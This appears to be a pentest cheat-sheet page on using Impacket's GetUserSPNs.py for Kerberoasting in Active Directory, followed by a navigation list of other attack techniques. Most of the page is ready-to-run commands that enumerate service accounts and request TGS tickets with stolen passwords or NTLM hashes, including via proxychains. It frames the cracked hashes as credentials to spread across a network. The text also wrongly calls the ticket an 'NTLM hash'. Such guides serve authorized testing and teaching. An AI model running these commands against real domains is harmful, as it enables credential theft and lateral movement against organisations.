GetUserSPNs.py

When to Use

Useful in post-compromise enumeration. If you acquire domain user passwords or hashes, you can use these credentials to see if there are any user accounts in Active Directory that have been configured with Service Principal Names (SPNs). Service Principals, are effectively user accounts in Active Directory with the purpose of running services.

Often times, Service Principals may be over-privileged or delegated to privileged resources. GetUserSPNs.py will allow the operator to request a Ticket-Granting-Service ticket, thereby revealing the Service Principal's NTLM hash, which may be able to be cracked. You could then pass the cracked service principal's password around the network.

Usage Examples

Password Authentication

The Kali Linux developers have created a series of wrappers around Impacket scripts. In this case, you can easily invoke GetUserSPNs.py by running impacket-GetUserSPNs

# List any service principals associated with the user
impacket-GetUserSPNs -dc-ip domain-controller-ip 'domain.tld/username:password'

# Request a TGS
impacket-GetUserSPNs -dc-ip domain-controller-ip 'domain.tld/username:password' -request

# Post-compromise via a proxy host
proxychains -q impacket-GetUserSPNs -dc-ip domain-controller-ip 'domain.tld/username:password'
proxychains -q impacket-GetUserSPNs -dc-ip domain-controller-ip 'domain.tld/username:password' -request

impacket-GetUserSPNs wrapper on Kali Linux invokes GetUserSPNs.py with user-supplied arguments

Pass the Hash

# List any service principals associated with the user
impacket-GetUserSPNs -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username'

# Request a TGS
impacket-GetUserSPNs -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username' -request

# Post-compromise via a proxy host
proxychains -q impacket-GetUserSPNs -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username'
proxychains -q impacket-GetUserSPNs -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username' -request

impacket-GetUserSPNs wrapper on Kali Linux invokes GetUserSPNs.py with user-supplied arguments

IPv6 DNS Spoofing

LLMNR Poisoning

Enumerating Hosts and Identifying the Domain Controllers

Passback Attacks

SMB Relay

NULL Session Enumeration

Kerberos Pre-Auth Username Enumeration

AS-REP Roasting

NTLM Credential Stuffing

PrintNightmare

Using Faketime for Ad-Hoc Kerberos Authentication

Kerberos Authentication from Kali

LdapDomainDump

Remote Bloodhound

BloodHound

LdapSearch

Dumping DNS Records with adidnsdump

Enum4Linux

NetExec

GetADUsers.py

GetUserSPNs.py

PowerShell AD Module on Any Domain Host as Any User

PowerView

Manual Enumeration

Extracting Secrets from PCAPs

Linux Remote Desktop Client

Pass the Hash

Pass the Password

Pass the Key

Pass the Certificate

Pass the Ticket

Password & Credential Brute Force

Spawn Processes as Other Users

Kerberoasting

Dumping Passwords from Windows Credential Manager

Dumping Hashes without Mimikatz

LdapModify

Mimikatz

Group Policy Preferences (GPP)

Impacket-Addcomputer

DCSync

Token Impersonation

Evil-WinRM Alternatives

PrintNightmare

ZeroLogon

GetUserSPNs.py

When to Use

Usage Examples

Password Authentication

Pass the Hash